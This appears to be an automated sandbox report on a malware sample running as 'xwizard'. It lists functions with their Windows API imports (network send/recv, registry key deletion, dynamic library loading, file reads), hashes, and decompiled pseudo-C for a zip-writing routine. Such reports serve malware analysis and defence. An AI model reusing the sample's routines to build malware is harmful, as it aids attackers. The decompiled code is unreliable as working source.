Opcode ID: f67feaac0145f20d08e7a551aa63a5ef549baa17d8645f123198e74be5506c2e
Instruction ID: 331b2ee2af7af9e314b8cfd2fab8a33ff8218399bbf528e54cfcbcff9f8d33b6
Opcode Fuzzy Hash: f67feaac0145f20d08e7a551aa63a5ef549baa17d8645f123198e74be5506c2e
Instruction Fuzzy Hash: 2461D6B0509740AED710AF25C18979ABBE4FF84348F008D1EF9D887251E7B994899F47

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4BC, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 155libraryloadertimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041236C: malloc.MSVCRT ref: 0041237C

LoadLibraryA.KERNEL32 ref: 0040A519
GetProcAddress.KERNEL32 ref: 0040A53C
GetProcAddress.KERNEL32 ref: 0040A55A
GetProcAddress.KERNEL32 ref: 0040A576
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040A604

Part of subcall function 00405D7D: EnterCriticalSection.KERNEL32 ref: 00405DAD
Part of subcall function 00405D7D: LeaveCriticalSection.KERNEL32 ref: 00405ECC

Strings

`(B, xrefs: 0040A5E2

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalSectionTime$EnterFileLeaveLibraryLoadSystemmalloc
String ID: `(B
API String ID: 2869995242-1914280996
Opcode ID: 19d6fc8c2d1306d8d053f19c73e800395e5ac708471e6663d3d13c85d9c19fe9
Instruction ID: 94c08b94b57df9e53fa0a2455e2e566f66701f19132ff7a1c430a127e0c0603f
Opcode Fuzzy Hash: 19d6fc8c2d1306d8d053f19c73e800395e5ac708471e6663d3d13c85d9c19fe9
Instruction Fuzzy Hash: 9761DEB44087109FD710AF26C584A6BBBF4BF88704F01892EE8D897391E7799985CF56

Uniqueness

Uniqueness Score: -1.00%

Function 004054AC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00405519
send.WS2_32 ref: 004055BC
select.WS2_32 ref: 0040561A
__WSAFDIsSet.WS2_32 ref: 00405631
recv.WS2_32 ref: 00405657

Strings

Z, xrefs: 00405668

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: htonsrecvselectsend
String ID: Z
API String ID: 3248711867-1505515367
Opcode ID: d1c7e8c7d765277cb125de7b5cc9455829c706bfefb31e84546ff358b7451e8d
Instruction ID: 3f3365598393d2eea2e9170436329f57a1f754e33c93ecced5829fb6f7628eb6
Opcode Fuzzy Hash: d1c7e8c7d765277cb125de7b5cc9455829c706bfefb31e84546ff358b7451e8d
Instruction Fuzzy Hash: 094117B0418744ABD321AF25C1843AFBBE4FF84758F508D2EF4D887291D7B995888B57

Uniqueness

Uniqueness Score: -1.00%

Function 0041086B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32 ref: 004108D0
RegOpenKeyExA.ADVAPI32 ref: 00410900

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

RegEnumKeyExA.ADVAPI32 ref: 00410958
RegCloseKey.ADVAPI32 ref: 0041096B
RegDeleteKeyA.ADVAPI32(00000000), ref: 00410978

Strings

@, xrefs: 0041099A

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Delete$CloseEnumOpen_vsnprintf
String ID: @
API String ID: 3258335120-2766056989
Opcode ID: a83bb4d84008ef8ca21de6d5731c3a3071ae5acd3bc0957a5ea7271d758828c5
Instruction ID: 9d604c6237a7cde6d8c47273939e6e17ca47206dd9184e21b4ed585c08607efa
Opcode Fuzzy Hash: a83bb4d84008ef8ca21de6d5731c3a3071ae5acd3bc0957a5ea7271d758828c5
Instruction Fuzzy Hash: FB31D2F04087059EE710EF26C59839FFBE4AF84748F00891EE4D897251D3B985898F9B

Uniqueness

Uniqueness Score: -1.00%

Function 00407E8C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00407E9F
fread.MSVCRT ref: 00407EC7
fclose.MSVCRT ref: 00407ED4
fclose.MSVCRT ref: 00407EDD

Strings

X/B, xrefs: 00407E94
MZ, xrefs: 00407EE2

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fclose$fopenfread
String ID: MZ$X/B
API String ID: 3873288765-3080073419
Opcode ID: d06aedc7c9e3b3293a92e1f957aa7035d759f161265d28a36525d5ec09abe733
Instruction ID: ae9e81fbcb7ca7b9316dc1c6fd5e5dd7cb62ebbbae1f2b5c39490275c7812f42
Opcode Fuzzy Hash: d06aedc7c9e3b3293a92e1f957aa7035d759f161265d28a36525d5ec09abe733
Instruction Fuzzy Hash: 81F0FEB55097419BDB00FFA6C5C515EB6E4AB44304F508C3EE49497281D778D8898B5B

Uniqueness

Uniqueness Score: -1.00%

Function 0041C87B, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 427
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041C87B(intOrPtr* _a4, signed int _a8, signed int _a12, signed int _a16, char* _a20, signed short _a24, signed int _a28, signed int _a32, signed int _a36, intOrPtr _a40) {
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v38;
				char _v42;
				char _v46;
				char _v47;
				unsigned short _v48;
				char _v49;
				char _v50;
				char _v52;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				void _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				char _v84;
				signed short _v86;
				signed short _v88;
				signed int _v96;
				signed short _v100;
				signed int _v104;
				signed int _v108;
				intOrPtr _v112;
				unsigned int _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				intOrPtr _v212;
				signed int _v216;
				char* _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed short _t267;
				signed int _t269;
				signed int _t277;
				signed int _t280;
				signed int _t283;
				void* _t292;
				signed int _t301;
				void* _t319;
				signed int _t330;
				signed int _t337;
				void* _t340;
				void* _t348;
				signed int _t349;
				intOrPtr _t352;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr _t365;
				void* _t370;
				signed int _t371;
				signed int _t385;
				intOrPtr _t391;
				signed int _t394;
				unsigned short _t399;
				signed int _t427;
				char* _t428;
				signed int _t434;
				signed int _t437;
				void* _t438;
				signed short _t439;
				signed int _t441;
				signed int _t442;
				char** _t445;
				char** _t446;
				char** _t447;

				_t445 =  &_v220;
				_t370 = _a4;
				_v88 = 0;
				_v86 = 0;
				_v128 = _a24;
				_t257 = _a28;
				_v164 = _a32;
				_v160 = _a36;
				if(_t257 < 0) {
					_t257 = 6;
				}
				_v148 = 1;
				_t434 = _t257 & 0x0000000f;
				_v108 = _t434;
				if(_t434 != 0) {
					_t385 = _t257 >> 0x0000000a & 0x00000001;
					_v148 = _t385;
				}
				if(_t370 == 0) {
					L30:
					return 0;
				} else {
					_t441 =  *(_t370 + 0x48);
					if(_t441 != 0 &&  *((intOrPtr*)(_t370 + 0x14)) == 2) {
						_v156 = _a16 != 0;
						if((_v156 & (_t385 & 0xffffff00 | _a12 == 0x00000000)) == 0 && _a8 != 0 && (_v128 == 0 || _a20 != 0) &&  *(_t370 + 0x10) != 0xffff && _v108 <= 0xa) {
							_t259 = _t257 & 0x00000400;
							_v104 = _t259;
							if(_t259 != 0) {
								__eflags = _v160;
								if(_v160 > 0) {
									goto L30;
								}
								L17:
								_t261 = E00414919(_a8);
								__eflags = _t261;
								if(_t261 == 0) {
									goto L30;
								}
								_v116 =  *_t370;
								_v112 =  *((intOrPtr*)(_t370 + 4));
								 *_t445 =  &_v60;
								L0041F6BC();
								_t371 =  &_v86;
								E00415FC6(_v60, _t371,  &_v88);
								asm("repne scasb");
								_t267 =  !(_t371 | 0xffffffff) - 1;
								__eflags = _t267 - 0xffff;
								_v132 = _t267;
								if(_t267 > 0xffff) {
									goto L30;
								}
								_t269 = E0041493A(_t370);
								__eflags =  *(_t370 + 0x10) - 0xffff;
								_t427 = _t269;
								if( *(_t370 + 0x10) == 0xffff) {
									goto L30;
								}
								_v140 = _t269;
								_v96 = 0;
								_v136 = 0;
								_v100 = _v132;
								asm("adc edx, 0x0");
								_v124 =  *_t370 + 0x4c;
								_v120 =  *((intOrPtr*)(_t370 + 4));
								asm("adc edx, [esp+0x74]");
								asm("adc edx, [esp+0x8c]");
								asm("adc edx, [esp+0x64]");
								__eflags = 0;
								if(0 > 0) {
									goto L30;
								}
								__eflags = _v132;
								_v124 = 0;
								if(_v132 == 0) {
									L26:
									_t277 = _v128 & 0x0000ffff;
									_t391 = _a4;
									_t374 = _t391 + _t277 + 0x2e + _v132;
									__eflags = _a8 - _t391 + _t277 + 0x2e + _v132;
									if(_a8 >= _t391 + _t277 + 0x2e + _v132) {
										L28:
										_t74 =  &(_a20[1]); // 0x3
										_t375 = _t74;
										__eflags = _t74 - _a24;
										if(_t74 <= _a24) {
											L31:
											__eflags = _v148;
											if(_v148 != 0) {
												L35:
												_t437 = 0;
												__eflags = 0;
												L36:
												_t428 = _t427 + 0x1e;
												 *_t445 = _t428;
												_t280 = E00414DC1(_t370, _v112, _v116, __eflags);
												__eflags = _t280;
												if(_t280 != 0) {
													asm("adc edx, [esp+0x7c]");
													_v140 = _v140 + _v116;
													_t283 =  *(_t370 + 0x20);
													_t394 =  *(_t370 + 0x24);
													__eflags = _t394 | _t283;
													if((_t394 | _t283) != 0) {
														asm("adc edx, 0xffffffff");
														__eflags = _v136 & _t394 | _v140 & _t283 + 0xffffffff;
														if((_v136 & _t394 | _v140 & _t283 + 0xffffffff) != 0) {
															_v228 = 0x1837;
															_v232 = 0x424620;
															 *_t445 = "(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0";
															L0041F7E4();
														}
													}
													asm("adc edx, [esp+0x7c]");
													_v156 =  &(_t428[_v116]);
													_v152 = 0;
													memset( &_v60, 0, 0x1e << 0);
													_t446 =  &(_t445[3]);
													_v228 = _v152;
													_v220 = _v132;
													_v224 = _a8;
													_v232 = _v156;
													 *_t446 =  *(_t370 + 0x44);
													_t292 =  *((intOrPtr*)(_t370 + 0x3c))();
													__eflags = _v132 - _t292;
													if(_v132 != _t292) {
														L49:
														_v232 = _t437;
														 *_t446 =  *(_t370 + 0x34);
														 *((intOrPtr*)(_t370 + 0x2c))();
														goto L30;
													} else {
														asm("adc edx, [esp+0x54]");
														__eflags = _v104;
														_v156 = _v100 + _v156;
														_v152 = _v96;
														if(_v104 != 0) {
															L44:
															__eflags = _v148;
															if(_v148 == 0) {
																__eflags = _a16;
																if(_a16 == 0) {
																	_v148 = 0;
																	_v144 = 0;
																	_t442 = 0;
																	__eflags = 0;
																	L53:
																	_v232 = _t437;
																	 *_t446 =  *(_t370 + 0x34);
																	 *((intOrPtr*)(_t370 + 0x2c))();
																	__eflags = _v144;
																	if(_v144 > 0) {
																		goto L30;
																	}
																	__eflags = _v152;
																	if(_v152 > 0) {
																		goto L30;
																	}
																	_t438 =  &_v60;
																	_t399 = _v86;
																	_v116 = _v88;
																	__eflags = _t442 - 1;
																	_t301 = memset(_t438, 0, 0x1e << 0);
																	_t447 =  &(_t446[3]);
																	asm("sbb eax, eax");
																	_v48 = _t399;
																	_v47 = _t399 >> 8;
																	_v60 = 0x50;
																	_v59 = 0x4b;
																	_v56 =  !_t301 & 0x00000014;
																	_v58 = 3;
																	_v52 = _t442;
																	_v57 = 4;
																	_v50 = _v116;
																	_v49 = _v116 >> 8;
																	E00414900( &_v46, _a40);
																	E00414900( &_v42, _v148);
																	E00414900( &_v38, _v164);
																	_v220 = 0x1e;
																	_v224 = _t438;
																	_v32 = 0;
																	_v31 = 0;
																	_v34 = _v132;
																	_v228 = _v136;
																	_v33 = _v132 >> 8;
																	_v232 = _v140;
																	 *_t447 =  *(_t370 + 0x44);
																	_t319 =  *((intOrPtr*)(_t370 + 0x3c))();
																	__eflags = _t319 - 0x1e;
																	if(_t319 != 0x1e) {
																		goto L30;
																	}
																	_v208 = _t442 & 0x0000ffff;
																	_v188 = _v124;
																	_v192 = _v136;
																	_v196 = _v140;
																	_v216 = _v144;
																	_v200 = _v86 & 0x0000ffff;
																	_v224 = _v160;
																	_v204 = _v88 & 0x0000ffff;
																	_v212 = _a40;
																	_v220 = _v148;
																	_v228 = _v164;
																	_v232 = _v128 & 0x0000ffff;
																	 *_t447 = _a20;
																	_t330 = E00416311(_t370, _v132 & 0x0000ffff, _a8);
																	__eflags = _t330;
																	if(_t330 == 0) {
																		goto L30;
																	}
																	_t253 = _t370 + 0x10;
																	 *_t253 =  &(1[ *(_t370 + 0x10)]);
																	__eflags =  *_t253;
																	 *_t370 = _v156;
																	 *((intOrPtr*)(_t370 + 4)) = _v152;
																	return 1;
																}
																_v228 = 0;
																_v232 = 0xfffffff1;
																_v84 = _t370;
																_v68 = 0;
																_v76 = _v156;
																_v72 = _v152;
																_v64 = 0;
																 *_t446 = _v108;
																_v224 = E0041A99E();
																_v232 = E00416018;
																 *_t446 = _t437;
																_v228 =  &_v84;
																_t337 = E0041A64C();
																__eflags = _t337;
																if(_t337 == 0) {
																	_v224 = 4;
																	 *_t446 = _t437;
																	_v228 = _a16;
																	_v232 = _a12;
																	_t340 = E0041A5F0();
																	__eflags = _t340 != 1;
																	if(_t340 != 1) {
																		goto L49;
																	}
																	_t442 = 8;
																	_v148 = _v68;
																	_v144 = _v64;
																	_v156 = _v76;
																	_v152 = _v72;
																	goto L53;
																}
																goto L49;
															}
															L45:
															_v220 = _a16;
															_v228 = _v152;
															_v224 = _a12;
															_v232 = _v156;
															 *_t446 =  *(_t370 + 0x44);
															_t348 =  *((intOrPtr*)(_t370 + 0x3c))();
															__eflags = _a16 - _t348;
															if(_a16 != _t348) {
																goto L49;
															}
															_t349 = _a16;
															_v156 = _v156 + _t349;
															asm("adc [esp+0x54], edx");
															__eflags = _v104 - 1;
															_v144 = 0;
															_v148 = _t349;
															asm("sbb ebp, ebp");
															_t442 =  !_t441 & 0x00000008;
															goto L53;
														}
														 *_t446 = 0;
														_v228 = _a16;
														_v232 = _a12;
														_t352 = E004171DA();
														__eflags = _a16 - 3;
														_a40 = _t352;
														_v160 = 0;
														_v164 = _a16;
														if(_a16 <= 3) {
															goto L45;
														}
														goto L44;
													}
												}
												_v232 = _t437;
												_v132 = _t280;
												 *_t445 =  *(_t370 + 0x34);
												 *((intOrPtr*)(_t370 + 0x2c))();
												return _v132;
											}
											__eflags = _v156;
											if(_v156 == 0) {
												goto L35;
											}
											_v228 = 0x4df40;
											_v232 = 1;
											 *_t445 =  *(_t370 + 0x34);
											_t360 =  *((intOrPtr*)(_t370 + 0x28))();
											__eflags = _t360;
											_t437 = _t360;
											if(__eflags != 0) {
												goto L36;
											}
											goto L30;
										}
										 *_t445 = 1;
										_t362 = E00416134(_t370, _t375,  &_a16);
										__eflags = _t362;
										if(_t362 != 0) {
											goto L31;
										}
										goto L30;
									}
									 *_t445 = 1;
									_t364 = E00416134(_t370, _t374, _t441);
									__eflags = _t364;
									if(_t364 == 0) {
										goto L30;
									}
									goto L28;
								}
								_t365 = _a8;
								_t439 = _v132;
								__eflags =  *((char*)(_t365 + _t439 - 1)) - 0x2f;
								if( *((char*)(_t365 + _t439 - 1)) != 0x2f) {
									goto L26;
								}
								__eflags = _v164 | _v160;
								if((_v164 | _v160) != 0) {
									goto L30;
								}
								__eflags = _v156;
								if(_v156 != 0) {
									goto L30;
								}
								_v124 = 0x10;
								goto L26;
							}
							if((_v160 | _v164) == 0) {
								goto L17;
							}
						}
					}
					goto L30;
				}
			}

0x0041c87f
0x0041c89a
0x0041c8a1
0x0041c8ab
0x0041c8b5
0x0041c8b9
0x0041c8c0
0x0041c8c4
0x0041c8ca
0x0041c8cc
0x0041c8cc
0x0041c8d3
0x0041c8db
0x0041c8de
0x0041c8e5
0x0041c8ec
0x0041c8ef
0x0041c8ef
0x0041c8f5
0x0041cb03
0x00000000
0x0041c8fb
0x0041c8fb
0x0041c900
0x0041c918
0x0041c92c
0x0041c971
0x0041c976
0x0041c97d
0x0041c98e
0x0041c993
0x00000000
0x00000000
0x0041c999
0x0041c9a0
0x0041c9a5
0x0041c9a7
0x00000000
0x00000000
0x0041c9b2
0x0041c9bd
0x0041c9c1
0x0041c9c4
0x0041c9d0
0x0041c9de
0x0041c9ef
0x0041c9f5
0x0041c9f8
0x0041c9fd
0x0041ca01
0x00000000
0x00000000
0x0041ca09
0x0041ca0e
0x0041ca15
0x0041ca17
0x00000000
0x00000000
0x0041ca1d
0x0041ca28
0x0041ca33
0x0041ca3b
0x0041ca47
0x0041ca4a
0x0041ca53
0x0041ca5d
0x0041ca68
0x0041ca73
0x0041ca77
0x0041ca7a
0x00000000
0x00000000
0x0041ca80
0x0041ca85
0x0041ca8d
0x0041caba
0x0041caba
0x0041cabf
0x0041cac6
0x0041caca
0x0041cacd
0x0041cae3
0x0041cae6
0x0041cae6
0x0041cae9
0x0041caec
0x0041cb0a
0x0041cb0a
0x0041cb0f
0x0041cb39
0x0041cb39
0x0041cb39
0x0041cb3b
0x0041cb43
0x0041cb46
0x0041cb4b
0x0041cb50
0x0041cb52
0x0041cb7a
0x0041cb7e
0x0041cb82
0x0041cb89
0x0041cb8e
0x0041cb90
0x0041cb95
0x0041cba8
0x0041cbaa
0x0041cbac
0x0041cbb4
0x0041cbbc
0x0041cbc3
0x0041cbc3
0x0041cbaa
0x0041cbd0
0x0041cbd9
0x0041cbdf
0x0041cbf0
0x0041cbf0
0x0041cbf6
0x0041cbfa
0x0041cc05
0x0041cc0d
0x0041cc14
0x0041cc17
0x0041cc1a
0x0041cc1e
0x0041cd83
0x0041cd83
0x0041cd8a
0x0041cd8d
0x00000000
0x0041cc24
0x0041cc36
0x0041cc3a
0x0041cc42
0x0041cc46
0x0041cc4a
0x0041cc90
0x0041cc90
0x0041cc95
0x0041cd00
0x0041cd08
0x0041cdf1
0x0041cdf9
0x0041ce01
0x0041ce01
0x0041ce03
0x0041ce03
0x0041ce0a
0x0041ce0d
0x0041ce10
0x0041ce15
0x00000000
0x00000000
0x0041ce1b
0x0041ce20
0x00000000
0x00000000
0x0041ce2d
0x0041ce39
0x0041ce43
0x0041ce4a
0x0041ce4e
0x0041ce4e
0x0041ce50
0x0041ce52
0x0041ce5f
0x0041ce70
0x0041ce78
0x0041ce80
0x0041ce89
0x0041ce91
0x0041ce9c
0x0041cea4
0x0041ceb3
0x0041cec1
0x0041ced1
0x0041cee1
0x0041ceee
0x0041cef6
0x0041cefa
0x0041cf02
0x0041cf0a
0x0041cf15
0x0041cf1d
0x0041cf28
0x0041cf2f
0x0041cf32
0x0041cf35
0x0041cf38
0x00000000
0x00000000
0x0041cf4e
0x0041cf52
0x0041cf5a
0x0041cf62
0x0041cf6e
0x0041cf76
0x0041cf82
0x0041cf8d
0x0041cf98
0x0041cfa0
0x0041cfa8
0x0041cfb1
0x0041cfbc
0x0041cfc1
0x0041cfc6
0x0041cfc8
0x00000000
0x00000000
0x0041cfd6
0x0041cfd6
0x0041cfd6
0x0041cfd9
0x0041cfdb
0x00000000
0x0041cfde
0x0041cd16
0x0041cd1e
0x0041cd26
0x0041cd2d
0x0041cd38
0x0041cd46
0x0041cd4d
0x0041cd58
0x0041cd60
0x0041cd6b
0x0041cd73
0x0041cd76
0x0041cd7a
0x0041cd7f
0x0041cd81
0x0041cd9c
0x0041cda4
0x0041cda7
0x0041cdb2
0x0041cdb6
0x0041cdbb
0x0041cdbc
0x00000000
0x00000000
0x0041cdcc
0x0041cdd1
0x0041cdd5
0x0041cde7
0x0041cdeb
0x00000000
0x0041cdeb
0x00000000
0x0041cd81
0x0041cc97
0x0041cca2
0x0041ccad
0x0041ccb1
0x0041ccb9
0x0041ccc0
0x0041ccc3
0x0041ccc6
0x0041cccd
0x00000000
0x00000000
0x0041ccd5
0x0041ccdc
0x0041cce0
0x0041cce4
0x0041ccec
0x0041ccf0
0x0041ccf4
0x0041ccf8
0x00000000
0x0041ccf8
0x0041cc53
0x0041cc5a
0x0041cc65
0x0041cc69
0x0041cc70
0x0041cc78
0x0041cc86
0x0041cc8a
0x0041cc8e
0x00000000
0x00000000
0x00000000
0x0041cc8e
0x0041cc1e
0x0041cb54
0x0041cb5b
0x0041cb5f
0x0041cb62
0x00000000
0x0041cb65
0x0041cb11
0x0041cb16
0x00000000
0x00000000
0x0041cb18
0x0041cb20
0x0041cb2b
0x0041cb2e
0x0041cb31
0x0041cb33
0x0041cb35
0x00000000
0x00000000
0x00000000
0x0041cb37
0x0041caf1
0x0041cafa
0x0041caff
0x0041cb01
0x00000000
0x00000000
0x00000000
0x0041cb01
0x0041cacf
0x0041cada
0x0041cadf
0x0041cae1
0x00000000
0x00000000
0x00000000
0x0041cae1
0x0041ca8f
0x0041ca96
0x0041ca9a
0x0041ca9f
0x00000000
0x00000000
0x0041caa5
0x0041caa9
0x00000000
0x00000000
0x0041caab
0x0041cab0
0x00000000
0x00000000
0x0041cab2
0x00000000
0x0041cab2
0x0041c987
0x00000000
0x00000000
0x0041c989
0x0041c92c
0x00000000
0x0041c900

APIs

time.MSVCRT ref: 0041C9C4

Part of subcall function 00415FC6: localtime.MSVCRT ref: 00415FDA

_assert.MSVCRT ref: 0041CBC3

Strings

K, xrefs: 0041CE78
FB, xrefs: 0041CBB4
P, xrefs: 0041CE70

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assertlocaltimetime
String ID: FB$K$P
API String ID: 239888755-1627385504
Opcode ID: cd97700670ffc604625be893ed21d500fd9a320e9f0d6e3cdad60bc31f370bed
Instruction ID: 8e089169dfaa1868ebee7eec05d644c009e56557b81e72ef4d504278135b65ea
Opcode Fuzzy Hash: cd97700670ffc604625be893ed21d500fd9a320e9f0d6e3cdad60bc31f370bed
Instruction Fuzzy Hash: 9222BF7494D3818FD720CF29C58579BBBE1BF88704F14892EE89887351E7B8E885CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00401DD8, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 58
stringCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00401DD8(void* __ebx, void* __ebp, char* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a716, char _a1232) {
				void* _t23;
				intOrPtr* _t31;

				 *_t31 = 0x414;
				_t23 = malloc(??);
				if(_t23 != 0) {
					 *__esp = __ebx;
					_a16 = 0x204;
					__ebp = __ebp | 0xffffffff;
					_a12 = __eax;
					_a8 = 1;
					_a4 = 7;
					__eax = E004129FB(__eax);
					__eax =  &_a1232;
					 *__esp = __ebx;
					_a16 = 0x1000;
					_a8 = 2;
					_a4 = 7;
					__ebx =  &_a716;
					_a12 = __eax;
					__eax = E004129FB(__eax);
					_t11 =  &(__esi[0x204]); // 0x204
					__eax = _t11;
					__esi[0x40c] = 0;
					strcpy(_t11, __esi) = strcpy(__ebx, __esi);
					__eax = 0;
					__ecx = __ebp;
					asm("repne scasb");
					__ecx =  !__ebp;
					 *((char*)(__esp + __ecx + 0x2ca)) = 0;
					__eax = strcat(__ebx, 0x422a15);
					__eax = E0041E44C(__ecx, __edx, __eax, 6, 0x77);
					__ecx = __ebp;
					__esi[0x408] = __eax;
					__eax = 0;
					asm("repne scasb");
					 !__ebp =  !__ebp - 1;
					__esi[0x410] =  !__ebp - 1;
					_a4 = __esi;
					 *__esp = E00406F83;
					_t23 = E00407F08();
				}
				return _t23;
			}

0x00401dd8
0x00401ddf
0x00401de8
0x00401dee
0x00401df1
0x00401df9
0x00401dfc
0x00401e00
0x00401e0a
0x00401e12
0x00401e17
0x00401e1e
0x00401e21
0x00401e29
0x00401e31
0x00401e39
0x00401e40
0x00401e44
0x00401e49
0x00401e49
0x00401e4f
0x00401e6c
0x00401e71
0x00401e73
0x00401e75
0x00401e79
0x00401e7b
0x00401e8e
0x00401ea6
0x00401eab
0x00401ead
0x00401eb3
0x00401eb5
0x00401eb9
0x00401eba
0x00401ec0
0x00401ec4
0x00401632
0x00401632
0x004023e9

APIs

malloc.MSVCRT ref: 00401DDF
strcpy.MSVCRT ref: 00401E60
strcpy.MSVCRT ref: 00401E6C
strcat.MSVCRT ref: 00401E8E

Part of subcall function 0041E44C: malloc.MSVCRT ref: 0041E48F
Part of subcall function 0041E44C: free.MSVCRT ref: 0041E510

Strings

.zip, xrefs: 00401E83
w, xrefs: 00401E93

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: mallocstrcpy$freestrcat
String ID: .zip$w
API String ID: 50812093-307292267
Opcode ID: 12eced5c5e03f3a4b95ac78e48c1e8d48df6755b0805452f08ce4e9f4e93a691
Instruction ID: b1c1002ecfc918ecf1bb7e30c12c5e9030ce2ae0e5289fadf73960591331f9fa
Opcode Fuzzy Hash: 12eced5c5e03f3a4b95ac78e48c1e8d48df6755b0805452f08ce4e9f4e93a691
Instruction Fuzzy Hash: 3421FCF05087059FD310AF25D18839EBBE0BB84758F11CD2EE4DC87291D7BD84899B4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 0040C2F3

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

fopen.MSVCRT ref: 0040C330
fgets.MSVCRT ref: 0040C35E
